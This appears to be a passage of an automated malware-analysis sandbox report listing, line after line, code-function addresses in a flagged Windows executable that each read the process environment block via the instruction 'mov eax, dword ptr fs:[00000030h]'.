          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F1AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01422AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142DA88 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142DA88 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B129A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014062A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014062A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014062A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014062A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01425AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01425AA0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F12D4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F3ACA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014212BD mov esi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014212BD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014212BD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F5AC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F5AC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F5AC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01433D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01473540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014A3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014A8D47 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01417D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01434D51 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01434D51 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F751A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01418D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01418D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01418D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01418D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01418D76 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B3518 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B3518 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B3518 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142F527 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0147A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F354C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F354C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01424D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01424D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01424D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014AFDD3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F3591 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014295EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014A8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01422581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B2D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BB581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BB581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BB581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BB581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F95F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F95F0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014265A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014265A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014265A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014235A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01421DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01421DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01421DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F15C1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F4439 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0148C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0148C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C8450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01435C70 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C8C75 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01476C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C8C14 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01412430 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01412430 mov eax, dword ptr fs:[00000030h]
